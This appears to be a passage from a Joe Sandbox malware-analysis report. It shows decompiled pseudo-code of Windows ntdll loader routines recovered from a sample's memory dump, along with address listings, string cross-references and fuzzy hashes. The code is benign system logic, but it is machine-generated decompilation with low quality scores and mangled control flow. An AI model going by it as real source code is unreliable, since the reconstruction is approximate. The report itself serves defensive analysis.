					_t280 = 0;
					if( *_v48 != 0) {
						E017ABB40(_t267,  &_v68, _t224);
						if(L017743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                              0x01773d3c
                                                                              0x01773d42
                                                                              0x01773d44
                                                                              0x01773d46
                                                                              0x01773d49
                                                                              0x01773d4c
                                                                              0x01773d4f
                                                                              0x01773d52
                                                                              0x01773d55
                                                                              0x01773d58
                                                                              0x01773d5b
                                                                              0x01773d5f
                                                                              0x01773d61
                                                                              0x01773d66
                                                                              0x017c8213
                                                                              0x017c8218
                                                                              0x01774085
                                                                              0x01774088
                                                                              0x0177408e
                                                                              0x01774094
                                                                              0x0177409a
                                                                              0x017740a0
                                                                              0x017740a6
                                                                              0x017740a9
                                                                              0x017740af
                                                                              0x017740b6
                                                                              0x017740bd
                                                                              0x017740bd
                                                                              0x01773d83
                                                                              0x017c821f
                                                                              0x017c8229
                                                                              0x017c8238
                                                                              0x017c8238
                                                                              0x017c823d
                                                                              0x017c823d
                                                                              0x01773da0
                                                                              0x01773daf
                                                                              0x01773db5
                                                                              0x01773dba
                                                                              0x01773dba
                                                                              0x01773dd4
                                                                              0x01773e94
                                                                              0x01773eab
                                                                              0x01773f6d
                                                                              0x01773f84
                                                                              0x0177406b
                                                                              0x0177406b
                                                                              0x0177406e
                                                                              0x0177406e
                                                                              0x01774070
                                                                              0x01774074
                                                                              0x017c8351
                                                                              0x017c8351
                                                                              0x0177407a
                                                                              0x0177407f
                                                                              0x017c835d
                                                                              0x017c8370
                                                                              0x017c8377
                                                                              0x017c8379
                                                                              0x017c837c
                                                                              0x017c837c
                                                                              0x017c835d
                                                                              0x00000000
                                                                              0x0177407f
                                                                              0x01773f8a
                                                                              0x01773f8d
                                                                              0x01773f90
                                                                              0x01773f95
                                                                              0x017c830d
                                                                              0x017c830f
                                                                              0x01773f9b
                                                                              0x01773fac
                                                                              0x01773fae
                                                                              0x01773fb1
                                                                              0x01773fb1
                                                                              0x01773fb6
                                                                              0x017c8317
                                                                              0x017c831a
                                                                              0x00000000
                                                                              0x01773fbc
                                                                              0x01773fc1
                                                                              0x01773fc9
                                                                              0x01773fd7
                                                                              0x01773fda
                                                                              0x01773fdd
                                                                              0x01774021
                                                                              0x01774021
                                                                              0x01774029
                                                                              0x01774030
                                                                              0x01774044
                                                                              0x01774046
                                                                              0x01774046
                                                                              0x01774044
                                                                              0x01774049
                                                                              0x017c8327
                                                                              0x017c8334
                                                                              0x017c8339
                                                                              0x017c833c
                                                                              0x0177404f
                                                                              0x0177404f
                                                                              0x0177404f
                                                                              0x01774051
                                                                              0x01774056
                                                                              0x01774063
                                                                              0x01774063
                                                                              0x01774068
                                                                              0x00000000
                                                                              0x01774068
                                                                              0x01773fdf
                                                                              0x01773fe2
                                                                              0x01773fe4
                                                                              0x01773fe7
                                                                              0x01773fef
                                                                              0x01774003
                                                                              0x01774005
                                                                              0x01774005
                                                                              0x0177400c
                                                                              0x01774013
                                                                              0x01774016
                                                                              0x01774017
                                                                              0x0177401b
                                                                              0x0177401e
                                                                              0x00000000
                                                                              0x0177401e
                                                                              0x01773fb6
                                                                              0x01773eb1
                                                                              0x01773eb4
                                                                              0x01773eb7
                                                                              0x01773ebc
                                                                              0x017c82a9
                                                                              0x017c82ab
                                                                              0x01773ec2
                                                                              0x01773ed3
                                                                              0x01773ed5
                                                                              0x01773ed8
                                                                              0x01773ed8
                                                                              0x01773edd
                                                                              0x017c82b3
                                                                              0x017c82b6
                                                                              0x00000000
                                                                              0x01773ee3
                                                                              0x01773ee8
                                                                              0x01773eed
                                                                              0x01773ef0
                                                                              0x01773ef3
                                                                              0x01773f02
                                                                              0x01773f05
                                                                              0x01773f08
                                                                              0x017c82c0
                                                                              0x017c82c3
                                                                              0x017c82c5
                                                                              0x017c82c8
                                                                              0x017c82d0
                                                                              0x017c82e4
                                                                              0x017c82e6
                                                                              0x017c82e6
                                                                              0x017c82ed
                                                                              0x017c82f4
                                                                              0x017c82f7
                                                                              0x017c82f8
                                                                              0x017c82fc
                                                                              0x017c82ff
                                                                              0x017c82ff
                                                                              0x01773f0e
                                                                              0x01773f11
                                                                              0x01773f16
                                                                              0x01773f1d
                                                                              0x01773f31
                                                                              0x017c8307
                                                                              0x017c8307
                                                                              0x01773f31
                                                                              0x01773f39
                                                                              0x01773f48
                                                                              0x01773f4d
                                                                              0x01773f50
                                                                              0x01773f50
                                                                              0x01773f53
                                                                              0x01773f58
                                                                              0x01773f65
                                                                              0x01773f65
                                                                              0x01773f6a
                                                                              0x00000000
                                                                              0x01773f6a
                                                                              0x01773edd
                                                                              0x01773dda
                                                                              0x01773ddd
                                                                              0x01773de0
                                                                              0x01773de5
                                                                              0x017c8245
                                                                              0x01773deb
                                                                              0x01773df7
                                                                              0x01773dfc
                                                                              0x01773dfe
                                                                              0x01773e01
                                                                              0x01773e01
                                                                              0x01773e06
                                                                              0x017c824d
                                                                              0x017c824f
                                                                              0x017c8254
                                                                              0x00000000
                                                                              0x01773e0c
                                                                              0x01773e11
                                                                              0x01773e16
                                                                              0x01773e19
                                                                              0x01773e29
                                                                              0x01773e2c
                                                                              0x01773e2f
                                                                              0x017c825c
                                                                              0x017c825f
                                                                              0x017c8261
                                                                              0x017c8264
                                                                              0x017c826c
                                                                              0x017c8280
                                                                              0x017c8282
                                                                              0x017c8282
                                                                              0x017c8289
                                                                              0x017c8290
                                                                              0x017c8293
                                                                              0x017c8294
                                                                              0x017c8298
                                                                              0x017c829b
                                                                              0x017c829b
                                                                              0x01773e35
                                                                              0x01773e38
                                                                              0x01773e3d
                                                                              0x01773e44
                                                                              0x01773e58
                                                                              0x017c82a3
                                                                              0x017c82a3
                                                                              0x01773e58
                                                                              0x01773e60
                                                                              0x01773e6f
                                                                              0x01773e74
                                                                              0x01773e77
                                                                              0x01773e77
                                                                              0x01773e7a
                                                                              0x01773e7f
                                                                              0x01773e8c
                                                                              0x01773e8c
                                                                              0x01773e91
                                                                              0x00000000
                                                                              0x01773e91

                                                                              Strings
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 01773DC0
                                                                              • WindowsExcludedProcs, xrefs: 01773D6F
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 01773E97
                                                                              • Kernel-MUI-Language-SKU, xrefs: 01773F70
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 01773D8C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              • Opcode ID: 1a3eabb1bb1d0fa5fec9df89a54af7044a46e1ac6135b6a2cc0745cbb01b6902
                                                                              • Instruction ID: 3e88bc23c674ea5e468f8e465d5ebbd5bca6f6a85b851fb81fb13760b87ad291
                                                                              • Opcode Fuzzy Hash: 1a3eabb1bb1d0fa5fec9df89a54af7044a46e1ac6135b6a2cc0745cbb01b6902
                                                                              • Instruction Fuzzy Hash: ABF14A72D00619EFCF12DF98C984AEEFBB9FF58650F15016AE506A7210E7749E01DBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01798E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 44%
                                                                              			E01798E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x185d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1858464; // 0x76690110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1855780 & 0x00000003) != 0) {
							E017E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1855780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E017AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1857984; // 0x1302b60
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1858464; // 0x76690110
					 *0x185b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01799B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1855780 & 0x00000005) != 0) {
						_push(_t49);
						E017E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                              0x01798e0f
                                                                              0x01798e16
                                                                              0x01798e19
                                                                              0x01798e1b
                                                                              0x01798e21
                                                                              0x01798e7f
                                                                              0x01798e85
                                                                              0x017d9354
                                                                              0x017d936c
                                                                              0x017d9371
                                                                              0x017d937b
                                                                              0x017d9381
                                                                              0x017d9381
                                                                              0x017d937b
                                                                              0x01798e9d
                                                                              0x01798e9d
                                                                              0x01798e29
                                                                              0x01798e2c
                                                                              0x01798e38
                                                                              0x01798e3e
                                                                              0x01798e43
                                                                              0x01798eb5
                                                                              0x01798eb9
                                                                              0x017d92aa
                                                                              0x017d92af
                                                                              0x017d92e8
                                                                              0x017d92e8
                                                                              0x017d92af
                                                                              0x01798eb9
                                                                              0x01798e45
                                                                              0x01798e53
                                                                              0x01798e5b
                                                                              0x01798e5f
                                                                              0x01798e78
                                                                              0x01798e78
                                                                              0x01798e7d
                                                                              0x01798ec3
                                                                              0x01798ecd
                                                                              0x01798ed2
                                                                              0x01798ed2
                                                                              0x01798ec5
                                                                              0x01798ec5
                                                                              0x00000000
                                                                              0x01798e7d
                                                                              0x01798e67
                                                                              0x01798ea4
                                                                              0x017d931a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d9320
                                                                              0x01798ea4
                                                                              0x01798e70
                                                                              0x017d9325
                                                                              0x017d9340
                                                                              0x017d9345
                                                                              0x017d9345
                                                                              0x01798e76
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Strings
                                                                              • LdrpFindDllActivationContext, xrefs: 017D9331, 017D935D
                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 017D9357
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 017D933B, 017D9367
                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017D932A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 0-3779518884
                                                                              • Opcode ID: 69601544a80f8c02444fe435bb75c07722f1ce81d83be2158fae4b0cb7de8452
                                                                              • Instruction ID: 9f0f7bcc470dccd16bb10cfe6af48a1f7216920e85be51943cb30d3408846eaf
                                                                              • Opcode Fuzzy Hash: 69601544a80f8c02444fe435bb75c07722f1ce81d83be2158fae4b0cb7de8452
                                                                              • Instruction Fuzzy Hash: C8412C72A0031D9FEF316A2DE868A75F7B5F70B314F094169E90457191E7746D888783
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01778794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 83%
                                                                              			E01778794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0177934A() != 0) {
								_t159 = E017EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1855780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E017E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1855780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0177849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01778999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01778999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1855c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1855c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01782280(_t92, 0x18586cc);
															_t94 = E01839DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E017961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1855c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01778A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1855c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1855c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E017AF380(_t136, 0x1741184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01782280(_t108, 0x18586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E017961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01839D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0177FFB0(_t118, _t156, 0x18586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E017A9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                              0x01778799
                                                                              0x0177879d
                                                                              0x017787a1
                                                                              0x017787a3
                                                                              0x017787a8
                                                                              0x017787c3
                                                                              0x017787c3
                                                                              0x017787c8
                                                                              0x017787d1
                                                                              0x017787d4
                                                                              0x017787d8
                                                                              0x017787e5
                                                                              0x017787ec
                                                                              0x017c9bfe
                                                                              0x017c9c00
                                                                              0x017c9c02
                                                                              0x017c9c08
                                                                              0x017c9c0d
                                                                              0x017c9c0f
                                                                              0x017c9c14
                                                                              0x017c9c2d
                                                                              0x017c9c32
                                                                              0x017c9c37
                                                                              0x017c9c3a
                                                                              0x017c9c3c
                                                                              0x017c9c42
                                                                              0x017c9c42
                                                                              0x017c9c3c
                                                                              0x017c9c02
                                                                              0x017787da
                                                                              0x017787df
                                                                              0x017787e3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017787e3
                                                                              0x017787f2
                                                                              0x00000000
                                                                              0x017787fb
                                                                              0x017787fd
                                                                              0x017787fe
                                                                              0x0177880e
                                                                              0x0177880f
                                                                              0x01778810
                                                                              0x01778814
                                                                              0x0177881a
                                                                              0x0177881c
                                                                              0x0177881f
                                                                              0x01778821
                                                                              0x01778822
                                                                              0x01778824
                                                                              0x01778826
                                                                              0x0177882c
                                                                              0x0177882e
                                                                              0x017c9c48
                                                                              0x017c9c48
                                                                              0x01778834
                                                                              0x01778834
                                                                              0x01778837
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01778837
                                                                              0x0177882e
                                                                              0x0177883d
                                                                              0x01778840
                                                                              0x01778843
                                                                              0x01778846
                                                                              0x01778849
                                                                              0x0177884c
                                                                              0x0177884e
                                                                              0x01778850
                                                                              0x01778852
                                                                              0x01778854
                                                                              0x01778857
                                                                              0x017788b4
                                                                              0x017788b6
                                                                              0x017788b6
                                                                              0x01778859
                                                                              0x01778859
                                                                              0x01778859
                                                                              0x01778861
                                                                              0x01778866
                                                                              0x0177886a
                                                                              0x0177893d
                                                                              0x01778941
                                                                              0x00000000
                                                                              0x01778947
                                                                              0x01778947
                                                                              0x0177894a
                                                                              0x0177894c
                                                                              0x00000000
                                                                              0x01778952
                                                                              0x01778955
                                                                              0x0177895a
                                                                              0x0177895d
                                                                              0x0177895d
                                                                              0x0177895f
                                                                              0x01778961
                                                                              0x01778961
                                                                              0x01778968
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177896a
                                                                              0x0177896b
                                                                              0x0177896e
                                                                              0x00000000
                                                                              0x01778970
                                                                              0x01778970
                                                                              0x01778970
                                                                              0x01778970
                                                                              0x01778972
                                                                              0x01778972
                                                                              0x01778974
                                                                              0x00000000
                                                                              0x0177897a
                                                                              0x0177897a
                                                                              0x0177897d
                                                                              0x00000000
                                                                              0x01778983
                                                                              0x017c9c65
                                                                              0x017c9c6d
                                                                              0x017c9c72
                                                                              0x017c9c75
                                                                              0x017c9c75
                                                                              0x017c9c82
                                                                              0x017c9c86
                                                                              0x017c9c87
                                                                              0x017c9c88
                                                                              0x017c9c89
                                                                              0x017c9c8c
                                                                              0x017c9c90
                                                                              0x017c9c95
                                                                              0x017c9c97
                                                                              0x017c9ca0
                                                                              0x017c9ca3
                                                                              0x017c9ca9
                                                                              0x017c9ca9
                                                                              0x00000000
                                                                              0x017c9ca9
                                                                              0x017c9ca3
                                                                              0x00000000
                                                                              0x017c9c97
                                                                              0x0177897d
                                                                              0x00000000
                                                                              0x01778974
                                                                              0x01778988
                                                                              0x01778992
                                                                              0x01778996
                                                                              0x00000000
                                                                              0x01778996
                                                                              0x0177894c
                                                                              0x00000000
                                                                              0x01778870
                                                                              0x0177887b
                                                                              0x0177887d
                                                                              0x0177887f
                                                                              0x01778881
                                                                              0x01778884
                                                                              0x01778884
                                                                              0x01778886
                                                                              0x01778889
                                                                              0x0177888c
                                                                              0x0177888e
                                                                              0x01778891
                                                                              0x01778891
                                                                              0x01778898
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0177889a
                                                                              0x0177889b
                                                                              0x0177889e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017788a0
                                                                              0x017788a8
                                                                              0x017788b0
                                                                              0x017788b2
                                                                              0x017788d3
                                                                              0x017788d5
                                                                              0x00000000
                                                                              0x017788d7
                                                                              0x017788db
                                                                              0x017788dc
                                                                              0x017788e0
                                                                              0x017788e8
                                                                              0x017788ee
                                                                              0x017788f0
                                                                              0x017788f3
                                                                              0x017788fc
                                                                              0x01778901
                                                                              0x01778906
                                                                              0x0177890c
                                                                              0x0177890c
                                                                              0x0177890f
                                                                              0x01778916
                                                                              0x01778917
                                                                              0x01778918
                                                                              0x01778919
                                                                              0x0177891a
                                                                              0x0177891f
                                                                              0x01778921
                                                                              0x017c9c52
                                                                              0x017c9c55
                                                                              0x017c9c5b
                                                                              0x017c9cac
                                                                              0x017c9cc0
                                                                              0x017c9cc0
                                                                              0x017c9c55
                                                                              0x01778927
                                                                              0x01778927
                                                                              0x0177892f
                                                                              0x01778933
                                                                              0x00000000
                                                                              0x017788f5
                                                                              0x017788f5
                                                                              0x00000000
                                                                              0x017788f7
                                                                              0x017788f7
                                                                              0x017788fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017788fa
                                                                              0x017788f5
                                                                              0x017788f3
                                                                              0x00000000
                                                                              0x017788d5
                                                                              0x00000000
                                                                              0x017788b2
                                                                              0x017788c9
                                                                              0x00000000
                                                                              0x017788c9
                                                                              0x0177887f
                                                                              0x0177886a
                                                                              0x01778857
                                                                              0x01778852
                                                                              0x017788bf
                                                                              0x017788bf
                                                                              0x017787aa
                                                                              0x017787ad
                                                                              0x017787ae
                                                                              0x017787b4
                                                                              0x017787b5
                                                                              0x017787b6
                                                                              0x017787b8
                                                                              0x017787bd
                                                                              0x017787c1
                                                                              0x017787f4
                                                                              0x017787fa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017787c1
                                                                              0x00000000

                                                                              Strings
                                                                              • LdrpDoPostSnapWork, xrefs: 017C9C1E
                                                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 017C9C18
                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 017C9C28
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 2994545307-1948996284
                                                                              • Opcode ID: 58975fdf494d1ce8d5121e0b70dea6d31108efb3dca870e7b9d4d02e8cf2ce5a
                                                                              • Instruction ID: 1c635b6833409defe05b3902ba358b16599de8808b79cd1f053fa176fdb303a9
                                                                              • Opcode Fuzzy Hash: 58975fdf494d1ce8d5121e0b70dea6d31108efb3dca870e7b9d4d02e8cf2ce5a
                                                                              • Instruction Fuzzy Hash: 4791F371A00206DBDF28DF59D488ABAFBB5FF45314F4541ADEA05AB245DB30EE01CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01777E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E01777E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0177CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
